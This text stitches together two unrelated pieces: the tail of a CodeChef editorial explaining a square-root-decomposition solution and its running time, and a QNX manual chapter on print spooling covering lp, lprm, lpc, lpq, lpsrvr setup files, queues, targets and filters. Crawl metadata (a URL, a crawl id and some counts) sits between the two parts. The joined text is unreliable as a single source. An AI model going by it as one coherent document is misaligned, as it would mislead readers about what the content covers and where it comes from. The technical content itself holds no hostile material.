Note that b_L \le b_R means that L and R are within O(S) elements away, so we can do the old query instead.
Let’s now see how to precompute \text{next}, \text{prev} and \text{last_in_blocks}. First, \text{next}[i] and \text{prev}[i] can easily be computed in O(N) time with the following code:
... next[1..N] prev[1..N] last[1..M] # initialized to 0 ... def precompute(): ... for i in 1...N next[i] = N+1 prev[i] = 0 for i in 1...N j = last[A[i]] if j != 0 next[j] = i prev[i] = j last[A[i]] = i
The
last array stores the last index encountered for every value, and is updated as we traverse the array.
And then \text{last_in_blocks} can be compute in O(BN) time:
... last_in_blocks[1..B][1..N] # initialized to 0 ... def precompute(): ... for b in 1...B L = b*S-S+1 R = min(b*S,N) for y in L...R if next[y] > R x = y while x > 0 last_in_blocks[b][x] = y x = prev[x] for x in 1...N for b in 2...B if last_in_blocks[b][x] == 0 last_in_blocks[b][x] = last_in_blocks[b-1][x]
The first loop finds the last value encountered at each block (with the check
next[y] > R), and proceeds setting the
last_in_blocks of all the indices until that position with equal value, using the
prev pointer. The second loop fills out the remaining entries, because some values do not have representatives in some blocks.
Running time
Now, what is the total running time then? The precomputation runs in O(BN) time, and each query takes O(S) time, so overall it is O(NB + QS). But remember that B = \Theta(N/S), so the algorithm is just O(N^2/S + QS). But we still have the freedom to choose the value of S. Now, most will simply choose S = \Theta(\sqrt{N}), so that the running time is O((N+Q)\sqrt{N}), but we are special, so we will be more pedantic.
Note that N^2/S is a decreasing function while QS is an increasing function. Also, remember that O(f(x)+g(x)) = O(\max(f(x),g(x))) (why?). Therefore, the best choice for S is one that makes N^2/S and QS equal (at least asymptotically). Thus, we want the choice S = \Theta(N/\sqrt{Q}) instead, and the running time is O(N\sqrt{Q}+Q)
(the +Q is there to account for when Q > N^2). For this problem, there’s not much difference between this and O((N+Q)\sqrt{N}), but the running time O(N\sqrt{Q}+Q) is mostly for theoretical interest, and when Q is much less than N (or much more), you’ll feel the difference.
Optimization side note: there is another way to do the old query without using our
LazyMap, or at least calling
has_key: traverse the array backwards. Here is an example:
... _index[1..M] ... def answer_query(L, R): ... if b_L >= b_R # old query answer = 0 for y in R...L by -1 _index[A[y]] = y for y in L...R answer = max(answer, y - _index[A[y]]) else ... return answer
I found that this is a teeny teeny bit faster than the original O(S) old query
Also, when choosing S, one does not have to choose \lfloor \sqrt{N} \rfloor, or even \lfloor N/\sqrt{Q} \rfloor, because there is still a constant hidden in the \Theta notation. This means that you still have the freedom to choose a multiplicative constant for S, which in practice essentially amounts to the freedom to select S however you want. To get the best value for S, try generating a large input (with varying values of M !), and finding the best choice for S via ternary search. The goal is to get the precomputation part and the query part roughly equal in running time. This technique of tweaking the parameters is incredibly useful in long contests where the time limit is usually tight.
Time Complexity:
O(M + (N + Q)\sqrt{N}) but a theoretically it is O(N \sqrt{Q} + Q)
Note that in the problem, Q is actually K.
|
https://discuss.codechef.com/t/qchef-editorial/10123
|
CC-MAIN-2020-40
|
refinedweb
| 2,553
| 69.21
|
Technology innovations over the years have made personal computing and the infrastructure inside our data centres even more powerful. Gone are the days when our laptops used to come with single processors and single cores. I wonder even if they ever sell such configurations in the market. Let us learn today how to find if queries are running in Parallel?
Talking about multi-cores on our desktops and servers, these days software like SQL Server just use them to the max. When working with SQL Server, there are a number of settings that influence using parallelism. Check blog SQL SERVER – MAXDOP Settings to Limit Query to Run on Specific CPU, SQL SERVER – CXPACKET – Parallelism – Usual Solution – Wait Type and many other posts on this topic.
Queries are Running in Parallel
Having said that, I have seen people struggle to identify parallel queries in their environments. So here is the first shot at this requirement.
SELECT p.dbid, p.objectid, p.query_plan, q.encrypted, q.TEXT, cp.usecounts, cp.size_in_bytes, cp.plan_handle FROM sys.dm_exec_cached_plans cp CROSS APPLY sys.dm_exec_query_plan(cp.plan_handle) AS p CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) AS q WHERE cp.cacheobjtype = 'Compiled Plan' AND p.query_plan.value('declare namespace p=" max(//p:RelOp/@Parallel)', 'float') > 0
Queries that run in parallel can be found with the above query. Remember, if a query runs in parallel it is a query that SQL Server thinks is expensive enough to run in parallel. MAX_DOP and the cost_threshold_for_parallelism drive the behaviour. MAX_DOP should be configured to match the number of physical processors in the server if required.
The next step is to understand what to do when you find them? When you find them look for ways to make them run more efficiently if they are run often and their performance during business hours is critical. Check indexing in DTA for recommendations, simplify the query, remove ORDER BYs, GROUP BYs, if they aren’t necessary – these are some steps to help you guided.
Another way to find parallelism is to get queries where the amount of time spent by the workers are more than the query execution time. You can also use the below method to get the same too:
SELECT
I hope these two scripts will be of use and you have something similar in your environments. I often use them while helping my client at Comprehensive Database Performance Health Check. Please share my scenario’s where you saw parallelism perform slower and how did you find them? Do let me know via comments.
Reference: Pinal Dave (
One of the scenarios where I have found parallelism to be slower is when we have MIS reports running off an OLTP system. The aggregations in the queries for these reports is costly enough for the SQL Server database engine to opt for a parallel plan, but the normalized nature of the OLTP schema causes it to backfire and impact performance. In such cases, we explicitly ensure that these queries run under a MAXDOP setting of 1, i.e. no parallelism.
In my comment above, I forgot to add the part about how I found that parallelism was creating a problem. Ours is a legacy system (where the schema has evolved since the days of SQL 7.0 and continues to undergo enhancements and growth even today). When SQL Server 2005 was launched and we undertook a certification effort, that’s when we noticed that our reports were literally bringing the server down to a crawl. The change was that SQL Server 2005 came with support for parallelism – the moment we set it to 1 (at the instance level), the performance improved confirming our theory. Later on, we modified the queries to use the MAXDOP query hint wherever required.
|
https://blog.sqlauthority.com/2015/07/25/sql-server-how-to-find-if-queries-are-running-in-parallel/
|
CC-MAIN-2022-21
|
refinedweb
| 626
| 62.58
|
Windows 10 Anniversary SDK is bringing exciting opportunities to developers
Hello from Build 2016! I just had an opportunity to participate in today’s keynote with Satya Nadella and Terry Myerson where we celebrated the progress we have made with Windows 10, gave a preview of the Windows 10 Anniversary Update, and talked about how we are continuing to invest in the Windows Platform to make it home for all developers. Terry’s blog summarizes many of today’s announcements, but in this post I want to share a few of the highlights for developers.
Throughout the year, I have heard from many of you, both in person and via our various feedback channels, and you have asked us for more. We know that every innovation with Windows is only as powerful as the ecosystem that rallies around it, so I want to cover today’s most important Build announcements and what they mean for our development community.
The Windows 10 Anniversary SDK
Today we are taking the first step with the announcement of the preview of the Windows 10 Anniversary SDK. It contains thousands of new features and APIs that are the direct result of your feedback.
Here are just a few of the significant improvements that we are excited about but didn’t have time to cover in the keynote:
- Connected Devices: We are bringing new ways to connect to, communicate with, and manage multiple devices and apps. This technology enables Cortana extensibility and the new Action Center in the Cloud, and it’s being introduced today.
- Background execution: We are bringing the ability to run your application in the background without requiring two separate processes. Along with extended execution and opportunistic tasks, writing applications that run when they need to will become simpler and more powerful.
- App Extensions: UWP now supports app extensibility allowing you to build an ecosystem based on your application. Microsoft Edge uses this technology for its own extensions.
- Action Center in the Cloud: Enables your app to engage with users on all their devices. You can now dismiss notifications on one device and they will be dismissed everywhere.
- Windows Store & Dev Center: Significate new tools include user roles in Dev Center, app flighting, improved analytics, an analytics API that allows you to grab your data and use it outside of the dashboard, user segmentation and targeting, A/B testing, app subscriptions, advertising improvements, and more.
Here at Build, we will talk about these and much more during more than one hundred technical sessions, all of which will be available for you to view on Channel 9 over the next several days.
Pioneers wanted: NUI Innovations coming to UWP
With the Universal Windows Platform, we have been creating new ways of interacting with our devices that go beyond touch and mouse to include vision, writing, speech, and more. It’s more than just the inputs and outputs; it’s about creating experiences that transcend a single device and enabling developers to orchestrate experiences across devices.
At today’s keynote we gave a detailed overview of some of the new innovations that are coming to Windows 10 in the Anniversary Update SDK:
- Windows Ink APIs: Together we will unlock.
- Microsoft HoloLens Development Edition begins shipping: The Windows Holographic SDK and emulator are now available for download and Microsoft HoloLens Development Edition is starting to ship to developers. These will enable you to create holographic apps using UWP. Our documentation and forums are up and running. We’re also happy to.
Windows is pioneering a change in how people will use technology: will you join?
Listening to your needs, embracing tools for multi-platform development on Windows.
We want Windows to be the best development environment regardless of the technologies you use or the platforms you target. We made cross-device a reality at the core of the Universal Windows Platform, and we are excited to offer more:
- Converting Desktop Apps (Project Centennial): We are shipping a new desktop.
- Xamarin: will make it easy to share code across platforms while delivering native experiences for each. Also, our open source Windows Bridge for iOS enables iOS developers to bring Objective-C code into Visual Studio, and compile it into a UWP app.
- Retail Dev Kit Unlock for Xbox One: Today we.
You asked us to help you in be more productive, and we listened. We will continue to invest in making Windows home for developers, regardless of which platform you build for.
Stay tuned to this blog over the course of the next week to view a series of in-depth posts that will go into details of some of the topics that I discussed here (Cortana, Windows Ink, Windows Store & Dev Center, Bash, and more).
Get involved.
What a difference a year makes. Last year at Build we were showing what would be possible in Windows 10, and today we celebrate more than 270 million devices on the platform!
Build is just the next step in this journey, but now is the time to get involved. Start developing on the Windows 10 Anniversary Update. To do so, install the latest Windows 10 for Insiders, update to Visual Studio 2015 Update 2, and then install the Windows 10 Anniversary SDK Preview Build 14295.
I cannot wait to celebrate our shared success next year at Build 2017.
– Kevin
Updated August 2, 2016 10:18 am
Join the conversation
Wow…. the Build keynote truly impressed me. The work being done to unify the platform and drive innovation is really showing off. I haven’t been this excited in years…
I enjoyed watching the execution of a native Steam game within the Store to explain how frame rate and modding is unaffected — and I laughed out loud — we know who this was targeted to.
As a long time MS developer it is deeply satisfying to see the company vigorously defend its vision for a unified and more stable platform. Thank you.
I hope that the CRT could support the UTF-8 encoding in ANSI C/C++ routines such as fopen, which currently only supports non-Unicode encodings such as Windows-1252, GBK, Big5 or SJIS. It’s awful to make a wrapper each time making or porting a cross-platform library.
One of my most favorite feature is Smart Card APIs.
Several SmartCard Cryptogram APIs were added to the Windows.Devices.SmartCards namespace to support secure cryptogram payment protocols. Payment apps using host card emulation to support tap-to-pay can use these APIs for additional security and performance. Apps can create a key and protect limited-use transaction keys using the TPM. Apps can also leverage the NGC (Next Generation Credentials) framework to protect the keys with the user’s PIN. These APIs delegate cryptogram generation to the system for enhanced performance. This also prevents any access to the keys and cryptograms by other apps.
The inkRecognizer doesn’t recognize handwriting on mobile. It doesn’t find any recognizers and there’s no way to install one for mobile… Help
1) a number of machines are stuck at older windows 10 versions and are not updating?
2) even on Windows Phones that support update to 10, it is not offered to the user automatically (most won’t know it can even update and how to do it)
3) many people have issue with tile database of start menu getting corrupted and other issues that make the Start menu and Notifications not appear, or even no UWP apps work, or the Store app disappear or not support install/updates of apps
so the future doesn’t look bright unless Microsoft deloys some automated fix about such stuff
…in my opinion you should acquire tweaking.com (and have them work with the SysInternals ones) or hire those guys to make automated fixes for Windows and push them via Windows Update and other channels (for those people who also have corruption of Windows Update)
Some laptops that was updated from older Windows didn’t got properly installed touchpad drivers so touchpad doesn’t work in UWP apps makes them totally unusable and needless.
This is good but still some useful APIs are missing in this SDK. There should be one API using which we can change directly Image Pixel colour by simply calling a method and also there should an HTMLEditor control that reads HTML, allow formatting options (bold,italic,etc) and gives final output as HTML. These APIs would be very useful if added in SDK in future.
|
https://blogs.windows.com/buildingapps/2016/03/30/windows-10-anniversary-sdk-is-bringing-exciting-opportunities-to-developers/
|
CC-MAIN-2017-13
|
refinedweb
| 1,417
| 57.4
|
CA1046: Do not overload operator equals on reference types
Cause
A public or nested public reference type overloads the equality operator.
Rule description
For reference types, the default implementation of the equality operator is almost always correct. By default, two references are equal only if they point to the same object.
How to fix violations
To fix a violation of this rule, remove the implementation of the equality operator.
When to suppress warnings
It is safe to suppress a warning from this rule when the reference type behaves like a built-in value type. If it is meaningful to do addition or subtraction on instances of the type, it is probably correct to implement the equality operator and suppress the violation.
Example
The following example demonstrates the default behavior when comparing two references.
using System; namespace DesignLibrary { public class MyReferenceType { private int a, b; public MyReferenceType (int a, int b) { this.a = a; this.b = b; } public override string ToString() { return String.Format("({0},{1})", a, b); } } }
Example
The following application compares some references.
using System; namespace DesignLibrary { public class ReferenceTypeEquality { public static void Main() { MyReferenceType a = new MyReferenceType(2,2); MyReferenceType b = new MyReferenceType(2,2); MyReferenceType c = a; Console.WriteLine("a = new {0} and b = new {1} are equal? {2}", a,b, a.Equals(b)? "Yes":"No"); Console.WriteLine("c and a are equal? {0}", c.Equals(a)? "Yes":"No"); Console.WriteLine("b and a are == ? {0}", b == a ? "Yes":"No"); Console.WriteLine("c and a are == ? {0}", c == a ? "Yes":"No"); } } }
This example produces the following output:
a = new (2,2) and b = new (2,2) are equal? No c and a are equal? Yes b and a are == ? No c and a are == ? Yes
Related rules
CA1013: Overload operator equals on overloading add and subtract
See also
Feedback
We'd love to hear your thoughts. Choose the type you'd like to provide:
Our feedback system is built on GitHub Issues. Read more on our blog.
|
https://docs.microsoft.com/en-us/visualstudio/code-quality/ca1046-do-not-overload-operator-equals-on-reference-types?view=vs-2017
|
CC-MAIN-2019-13
|
refinedweb
| 330
| 59.8
|
Graph library/interface with adapter(s), written in Scala
OverviewOverview
This library serves two purposes:
- Provide a common abstraction for accessing and manipulating a graph data structure
- Provide adapters for various databases (particularly graph databases)
I am a one-man show, so at best, what you see here is work I need in side projects. I've open-sourced this library because other people may find some of it useful.
My current focus is on providing an abstraction for the Neo4j graph database. As such, I have provided a common interface for accessing either an embedded database, or a remote/production instance.
UsageUsage
This library is written in Scala. It might interoperate with other JVM languages, but I make no guarantees.
Include the library in your project.Include the library in your project.
In the build.sbt file located in your project root:
// The core definitions library: libraryDependencies += "com.seancheatham" %% "graph-core" % "0.0.2" // To run a basic, in-memory graph: libraryDependencies += "com.seancheatham" %% "graph-memory-adapter" % "0.0.2" // To connect to a Neo4j graph: libraryDependencies += "com.seancheatham" %% "graph-neo4j-adapter" % "0.0.2" // To expose a graph as an HTTP server: libraryDependencies += "com.seancheatham" %% "graph-akka-layer" % "0.0.2" // To connect to an expopsed HTTP graph server: libraryDependencies += "com.seancheatham" %% "graph-akka-adapter" % "0.0.2" // To connect to an HBase graph: libraryDependencies += "com.seancheatham" %% "graph-hbase-adapter" % "0.0.2" // To connect to a BigTable graph: libraryDependencies += "com.seancheatham" %% "graph-big-table-adapter" % "0.0.2" // To connect to a Document Storage graph: libraryDependencies += "com.seancheatham" %% "graph-document-storage-adapter" % "0.0.2"
Create a Graph instanceCreate a Graph instance
Create a mutable in-memory graph:Create a mutable in-memory graph:
import com.seancheatham.graph.adapters.memory.MutableGraph val graph = new MutableGraph()
Create an immutable in-memory graph:Create an immutable in-memory graph:
import com.seancheatham.graph.adapters.memory.ImmutableGraph val graph = ImmutableGraph()()
Create an embedded Neo4jGraph:Create an embedded Neo4jGraph:
// Create a temporary Neo4j graph import com.seancheatham.graph.adapters.neo4j._ val graph = Neo4jGraph.embedded() // Create a graph which persists to disk import com.seancheatham.graph.adapters.neo4j._ val graph = Neo4jGraph.embedded("/path/to/save/to")
Connect to a remote Neo4j InstanceConnect to a remote Neo4j Instance
import com.seancheatham.graph.adapters.neo4j._ val address = "bolt://192.168.?.?" // If auth is required import org.neo4j.driver.v1.AuthTokens val auth = AuthTokens.basic("username", "password") val graph = Neo4jGraph(address, auth) // If auth is not required val graph = Neo4jGraph(address)
Create a nodeCreate a node
import play.api.libs.json._ val node1: Node = graph.addNode("label", Map("name" -> JsString("potato"))) // NOTE: The graph created previously may not be the same graph as `node1.graph` // Depending on the implementation of the Graph, a brand new graph may be created // after each change to it. To be safe, once you modify `graph`, throw it out. // Generally, mutable graphs will re-use the same Graph for each change.
Get a node by IDGet a node by ID
val alsoNode1: Option[Node] = graph.getNode("1") // OR, to be safe (see above) node1.graph.getNode("1")
Get nodes by label and/or dataGet nodes by label and/or data
val nodes: TraversableOnce[Node] = graph.getNodes(Some("label"), Map("name" -> JsString("potato")))
Create an edge between two nodesCreate an edge between two nodes
val edge1: Edge = graph.addEdge(node1, node2, "edge_label", Map("weight" -> Json.toJson(1.5))) // Or you can use some syntactic sugar: import com.seancheatham.graph.Edge.NodeEdgeSyntax val edge1: Edge = graph.addEdge(node1 -"LABEL"-> node2, Map("weight" -> Json.toJson(1.5)))
Fetch inbound or outbound edges for a nodeFetch inbound or outbound edges for a node
val incomingEdges: TraversableOnce[Edge] = graph.getIngressEdges(node1) val outgoingEdges: TraversableOnce[Edge] = graph.getEgressEdges(node1)
Update a node/edgeUpdate a node/edge
val updatedNode1 = graph.updateNode(node1)("name" -> JsString("carrot"), "category" -> JsString("vegetable")) val updatedEdge1 = graph.updateEdge(edge1)("weight" -> Json.toJson(2.3))
Expose a Graph as an Akka-backed HTTP ServerExpose a Graph as an Akka-backed HTTP Server
The graph-akka-layer module allows you to expose a Graph through a REST API Server, backed by Akka.
From an existing Graph instanceFrom an existing Graph instance
import com.seancheatham.graph.akka.http.HttpServer val graph: Graph = ??? val server = HttpServer(graph) // OR HttpServer(graph, "localhost", 8080) // Visit for API paths and details ... // Don't forget to shut it down server.shutdown()
Run as an Application via main methodRun as an Application via main method
Running the Application with no arguments will start a new mutable graph instance, bound to localhost:8080.
You can run the server using command line arguments (run -help for info), but the preferred way is using Typesafe configurations. In your application.conf file:
graph { http { host = "localhost" port = 8080 } type = "mutable" // OR: immutable, neo4j-embedded, neo4j-remote // If graph.type == "neo4j-embedded" neo4j { embedded { dir = "/tmp/neo4jembedded" } } // If graph.type == "neo4j-remote" neo4j { remote { address = "bolt://127.0.0.2" user = "neo4j" password = "neo4j" } } }
Once configured, just run the graph-akka-layer's "main()" method.
|
https://index.scala-lang.org/seancheatham/scala-graph/graph-akka-adapter/0.0.2?target=_2.11
|
CC-MAIN-2020-34
|
refinedweb
| 842
| 52.76
|
Search...
FAQs
Subscribe
Pie
FAQs
Recent topics
Flagged topics
Hot topics
Best topics
Search...
Search Coderanch
Advance search
Google search
Register / Login
Win a copy of
Functional Design and Architecture
this week in the
Functional programming
forum!
shah rah
Ranch Hand
124
87
Threads
0
Cows
since Jan 04, (124/100)
Number Threads Started (87 (124/10)
Number Threads Started (87/10)
Number Likes Received (0/3)
Number Likes Granted (0/3)
Set bumper stickers in profile (0/1)
Set signature in profile
Set a watch on a thread
Save thread as a bookmark
Create a post with an image (0/1)
Recent posts by shah rah
myfaces with NetBeans
I have Netbeans 6.8 and I want to learn myfaces. I created web application project and it allowed me to choose JSF framework and I am stuck. I want to know what jars do i need to work to myfaces and where should I save them. Please help me
show more
11 years ago
JSF
Transactions
Is there a difference between the way EJB handles transaction to the way Hibernate does.
In my project we do not have EJB's and all the DB transactions are done using hibernate. for eg I open transaction after Session is created and close once all the database work is complete.
appreciate your reply.
show more
11 years ago
Object Relational Mapping
inheritance
I read that diamond scenario cannot be handled by "extends " clause but handled by interface. Can somebody explain this to me.
c1 -- super class
c2 and c3 extends from c1
c4 extends from c2 and c3.
show more
11 years ago
Beginning Java
EJB and hibernate --same or different
What is the purpose of having EJB and hibernate in a project?
I thought hibernate is an alternative to EJB? Please clear me on this.
show more
12 years ago
EJB and other Jakarta /Java EE Technologies
using POJO classes---Is it a good programming practice?
Can I use POJO classes generated from hibernate instead of creating value objects in my code. Is it a good programming practice?
show more
12 years ago
Object Relational Mapping
Web service deployment in real projects
I had this question in my interview ---> how will I deploy Web services?
and I said it would be part of the WAR.
Am I correct?
I am a newbie to web services and I said I am familiar with it and he went ahead and tested me on how familiar I was!
show more
12 years ago
Web Services
Help me with this simple code
List list = new ArrayList();
list.add(0, 59);
//int total = ((Integer)(list.get(0))).intValue();
// this works
int total = list.get(0);
//compile error
System.out.println(total);
I am using netbeans IDE and java 1.6. I thought it will not give compile error and autoboxing feature will handle it...
Why the error?
show more
12 years ago
Java in General
Redirect user to login page after session expires
I want to redirect the user to login page if his session expires. He could be on any page and if his session expires he has to be redirected to Login screen.
I am doing this... I check for the session if it is new then redirect him to login page. What's happening is I am writing this piece of code on every page and I am checking for expired session and redirecting him to login.
I want to know if there is one place where we can write the code and user will be redirected to login page irrespective of on which page he is in when his session expires .
appreciate your help
show more
12 years ago
Servlets
how to do this?
I am trying to learn criteria and I want to execute something like
select deptno from dept; //get all deptno
Criteria criteria = session.createCriteria(Dept.class);List objects = criteria.list(); // this is returning all the rows-- deptno and deptname.
Is there a way I can specify in the criteria that its should only fetch all the depno and ignore deptnames?
show more
12 years ago
Object Relational Mapping
Strust2 validation problem
which folder should have actioname-validation.xml file? I am using TOMCAT and struts.xml is under classes directory.
appreciate your reply.
show more
12 years ago
Struts
Strust2 validation problem
I tried validation example as in above link. The only validation that works is if I provide a
non-numeric
value in "AGE" field. None of the other validation works.
Can some one help me regarding this.
show more
12 years ago
Struts
pass values between pages using Struts2
Finally I got it. Looks like there was a problem with names of the field and getter and setter names. I fixed the code on my first message too.
show more
12 years ago
Struts
pass values between pages using Struts2
If it is a simple form field like this it is working fine.
<s:form <s:textfield <s:submit/> </s:form>
but If I have a java bean I am unable to pass value to next page. I want to know how to pass complex objects? Appreciate your reply.
<s:form <s:textfield <s:submit/> </s:form>
show more
12 years ago
Struts
pass values between pages using Struts2
How to pass the firstname entered on the form to my success page.
In struts 2 examples. I haven't seen anyone using request.getParameter("firstname") to get form values or use request.setAttribute("fname",firstname) to pass values to another page.
can some one direct me on how to get form field values from my jsp page in STRUTS2?
show more
12 years ago
Struts
pass values between pages using Struts2
I have a register page with 2 fields and submit button. Once submitted I want to show a success page with paramaters entered in the prev page.
Very Simple but I am not clear how to do this with STRUTS2
ACTION CLASS --
public class Register extends ActionSupport { private Person person ; public String execute() throws Exception { setPerson(getPerson()); return SUCCESS; } public void setPerson(Person p) { person = p; } public Person getPerson() { return person; } }
MODEL CLASS public class Person { private String firstname ; public String getFirstName() { return firstname; } public void setFirstName(String firstname) { this.firstname = firstname; } }
JSP
Register.jsp
<s:form <s:textfield <s:submit/> </s:form>
Sucess.jsp
Thanks for registering: <s:property
I am getting message
Thanks for registering:
but not the value of the firstname. In old versions of struts
it would be setting a Request attribute and getting value from it on the JSP page. I am not sure how it is done in STRUTS2
appreciate reply.
show more
12 years ago
Struts
|
https://www.coderanch.com/u/141409/shah-rah
|
CC-MAIN-2021-43
|
refinedweb
| 1,118
| 64.81
|
for connected embedded systems
Print Spooling
This chapter covers the following topics:
- Introduction
- Using the spool utilities
- Spooler architecture
- The spool setup file
- Using setup files
- Example setup files
- Accessing spoolers and queues
Introduction
Sharing resources on a network
QNX encourages the network-wide distribution of resources with few artificial boundaries. Every device (disk, modem, printer, etc.) connected to a computer is, by default, a shared resource -- a program running on any computer has equal access to any device on the network, whether the device is connected to the same computer (local) or to another machine (remote).
Although it's easy for a user to transparently access any resource on the network, the system administrator may need to take steps to control access to certain types of resources. Most printers, for example, can be used by only one user at a time and therefore require some sort of enqueuing facility to avoid conflicts. To allow convenient access to printers, QNX provides a set of spooling services.
Spoolers
A spooler is simply a mechanism that accepts requests for a resource and then allocates the use of the resource according to a set of specified rules.
To understand how a spooler can be useful, let's look at how it controls access to a printer. A printer must be available at all times to users, yet it can print only one job at a time. If a spooler is present, users can send their data through the spooler rather than directly to the printer. Upon receiving data destined for the printer, the spooler writes this data into a temporary file instead of sending it immediately to the printer. Later, when the printer becomes available, the spooler will write the data to the printer. Thus, many users can freely submit print jobs to one physical printer.
QNX implements spooling through the use of named queues that are referenced by the "lp" set of utilities; these queues also reside in the file namespace in the /dev/spool directory. Data written to a queue will be placed on an internal list and ultimately sent to a defined output device.
The QNX spooling server (lpsrvr) can maintain many different spool queues. The following utilities operate on spool queues:
- lp
- submit files to a spool queue
- lprm
- remove jobs from a spool queue
- lpc
- control spooler queue
- lpq
- display spool queue status
For more information on these utilities, see the Utilities Reference. For information about how to queue print jobs to a printer on a TCP/IP network, see the chapter on remote printing in the TCP/IP for QNX User's Guide.
Using the spool utilities
Starting the spooler
Before any spooling can occur in a QNX system, you must run lpsrvr:
lpsrvr &
To determine what resources it has available, and how it's expected to manage them, the lpsrvr utility first looks for a setup file called /etc/config/lpsrvr.node (where node is the node ID of the node lpsrvr is running on). If no setup file is found with a .node extension, lpsrvr will use the /etc/config/lpsrvr file.
Submitting spool jobs
The following lp command will cause the file report to be inserted into the default spool queue and ultimately printed:
lp report
For more information on the default queue, see "The spool setup file" in this chapter.
In systems where more than one spool queue is available, you can specify the queue name. The following command inserts report into a spool queue called txt:
lp -P txt report
You could also use a command that writes directly to the queue file:
cp report /dev/spool/txt
Querying spool jobs
To examine the spool queue, you can use the lpq utility. The following is a sample output from lpq:
1: fred [job #39] 1400 bytes lalist.doc 2: wilma [job #42] 2312 bytes netdrvr.c
This utility lets you determine when any submitted jobs have been completed; it also provides the spool job ID for use with other lp utilities.
Canceling spool jobs
The lprm utility lets you remove jobs from a spool queue. You can remove a job explicitly by specifying its job ID number. Given the state of the default queue shown above, fred's job (#39) could be canceled with this command:
lprm 39
If job #39 is currently in progress, it will be abandoned. The success of abandoning current spool jobs may vary with the type of output device you're using -- some printers have large internal buffers.
The superuser may also remove all jobs belonging to a particular user. For example, all of fred's jobs can be canceled with the following command:
lprm fred
Controlling the spool queues
The lpc utility is a system administration tool for managing spoolers. It lets you perform many control functions, such as starting up or shutting down a queue. The following basic functions are provided:
- suspend/resume enqueuing of jobs
- suspend/resume dequeuing of jobs
- suspend/resume the current job
- delete the current job
- rearrange the jobs in a queue
- move jobs to a different queue
- display the status of queues
Note that lpc's functionality overlaps that of lpq and lprm. This overlap is convenient, because unlike lpq and lprm, lpc can be used interactively.
Spooler architecture
The QNX spooling system is based on two objects: queues and targets. These work with each other to provide a flexible method of controlling data transformations and queuing.
A queue is an internal list of pending data to be sent to a target. As mentioned earlier, each queue is given a name that users specify when submitting jobs.
A target is associated with the physical output device (e.g. a printer) and removes jobs from queues. You can connect the output of a queue to one or more targets or connect multiple queues to a single target. However, you can connect the output of a target to only one device.
Queues can have optional attributes called filters, which are of two types:
- copy-in (ci) filters, which perform operations on the data before it's copied onto a queue
- copy-out (co) filters, which operate on the data after it's removed from a queue.
For example:
ci=a2ps -H"$(file)" | awk '/%%EndProlog/ { print "<< /Duplex \ true >> setpagedevice"; } { print $0; }' co=echo $(username)"\n" "put" $(spfile) | SOCK=666 /usr/ucb/ftp net_printer
Targets may have an optional control program (cp) that allows the output device to be initialized between jobs if required. For example, if a job were canceled and the device needed to be primed again, a device-specific control program could detect SIGTERM and take whatever action necessary to restore the device to a stable state.
The following diagrams illustrate how queues, filters, and targets can be configured to work with each other.
One queue feeding a single target
The following configuration could be used where there's a single printer and where a single (or no) translation of the data is required:
Multiple queues feeding a single target
Multiple queues may feed a single target, in which case the target will select the appropriate job from all the jobs in those queues based upon queue priority, then upon time of submission (i.e. the oldest pending job).
At the end of this chapter, you'll find several example setup files. The above configuration is used in the example file in which one queue converts ASCII to PostScript, while the other is a direct PostScript queue. Both queues feed the same target, which sends the data to a PostScript printer.
One queue feeding multiple targets
If the output of a queue is sent to many targets, the spooler will select whichever target is available. The following configuration is useful if you have three printers side by side and it doesn't matter which one prints your job.
Multiple queues feeding multiple targets
The following configuration is a combination of the previous two examples. A third queue has a separate channel to one of the targets. This channel could be used to ensure that jobs requiring the third printer are always sent to that printer (e.g. the printer has color capabilities).
Chaining queues
The output of a queue is usually sent to one or more targets, but it's possible instead to chain the output into another queue.
With chaining, the output of a queue is placed directly onto the destination queue, thus avoiding any possible copy-in operation on that queue. If the final queue in a chain has a copy-out filter, the filter will be applied.
The spool setup file
When started, the spooler accesses a file to get its configuration information. If no file is specified on the command line, the spooler uses the /etc/config/lpsrvr file. This file defines queues, targets, and the relationships between them.
Syntax definitions
Queues and targets have symbolic names as well as a set of attributes. Each entry in the setup file has the following format:
[name] attribute attribute . . .
The definition of a queue or target begins with a [name] directive and consists of all valid attribute specifications until the next [name] directive. All leading white space is ignored. Comment lines start with a pound sign (#).
To continue a single attribute beyond one line, you must put a backlash (\) right before the newline character.
The name may be up to 48 characters long and may contain only alphanumeric characters.
If the object being described is a target, the name must be preceded by a dash (-). The dash is for delineation only; it isn't considered part of the name.
Each attribute consists of a two-letter key in one of the following forms:
- key (Boolean)
- key#number (numeric)
- key=string (character)
All numbers are assumed to be decimal numbers, unless they start with a leading zero (meaning octal) or a leading 0x (meaning hex).
All strings contain printable characters. The backslash (\) is a "special" character. It can be used to escape other characters. For example, a "real" backslash must be represented with: \\
The following table describes all defined keys, including the default used for each key if its corresponding attribute isn't specified. In the Use column, "Q" means "queue," "T" means "target," and "G" means "global."
Since the keys are case-sensitive, we reserve all keys formed by two lowercase letters. You can safely implement custom extensions by using uppercase or mixed-case keys. The spooler utilities will ignore any options they don't understand.
Global keywords
Two keywords, sp and cd, can define global information for the spooler. To make them apply globally, you precede these keywords with a pair of empty brackets ([ ]).
Registering names -- sp
Since the spooler always adopts the /dev/spool file namespace, only one spooler may run on each node. You can run multiple spoolers on your network if each spooler registers a different global name. Otherwise, each spooler will attempt to register the same default global name /qnx/spooler. With multiple spoolers, you may wish to use names such as /qnx/spooler2, /qnx/spooler3, and so on.
To specify the global name to be registered by a spooler, you use the sp command in the setup file. The name must always begin with a leading slash (/). If no sp keyword is specified, the default name /qnx/spooler is globally registered (i.e. network-wide).
Specifying a temporary directory for spool files -- cd
The cd keyword lets you define the directory to use for the creation of the spooler's temporary spool files. By default, temporary files are created in the /usr/spool/lp directory. These files get deleted when they're no longer required.
Any path you specify to the cd keyword should begin with a leading slash. Note that the specified directory must exist, with appropriate access rights assigned.
The following example setup file informs the spooler to register the name /qnx/spooler2; it also places temporary files in the /tmp/spool2 directory:
# Global spooler variables [ ] sp=/qnx/spooler2 cd=/tmp/spool2 # Text queue [txt]....
Variables
The spooler will set the following variables appropriately when it encounters them:
In addition, all the keys defined above can be referenced as variables. For example, $(ci) will expand to the name of the copy-in command, ci=string.
Default behavior
The cat command is used as the default copy-in and copy-out filter commands. Also, unless otherwise specified in the setup file, the standard input and standard output of filter commands are automatically connected to default files or processes. The default for copy-in is as follows:
cat < $(fname) > $(spfile)
There are two possible defaults for a copy-out, depending on whether or not a control program (i.e. cp) is defined:
cat < $(spfile) > $(device) cat < $(spfile) | $(cp) > $(device)
